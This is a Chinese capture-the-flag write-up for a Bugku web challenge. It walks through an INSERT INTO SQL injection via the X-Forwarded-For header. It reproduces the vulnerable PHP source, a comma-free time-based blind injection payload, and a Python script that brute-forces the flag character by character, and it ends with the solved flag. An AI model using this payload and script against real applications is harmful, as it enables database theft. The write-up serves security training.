WP-Bugku-INSERT INTO注入

题目地址http://120.24.86.145:8002/web15/

题目给了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

这是X_FORWARDED_FOR注入,但是过滤了,,被过滤的情况下,无法使用if语句
当然在mysql下除了if还有

1
select case when xxx then xxx else xxx end;

而且由于,被过滤,无法使用substr和substring,但是这里可以使用from 1 for 1替代,最后payload如下

1
11'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))%23

python 脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
import string

mystring = string.ascii_letters+string.digits
url='http://120.24.86.145:8002/web15/'
data = "127.0.0.1'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep(5) else 1 end) and '1'='1" #这里的{}对应的是后面所需要的format
flag = ''

for i in range(1,35):
for j in mystring:
try:
headers = {'x-forwarded-for':data.format(str(i),j)}
res = requests.get(url,headers=headers,timeout=3)
except requests.exceptions.ReadTimeout:
flag += j
print flag
break

print 'The final flag:'+flag

这个代码的原理就是利用127.0.0.1+true/false去进行判断,如果是true,就与超时相违背,从而执行下面except的代码。

得到 flag{cdbf14c9551d5be5612f7bb5d2867853}

AbelChe wechat
扫码加微信
Donate here!!!
0%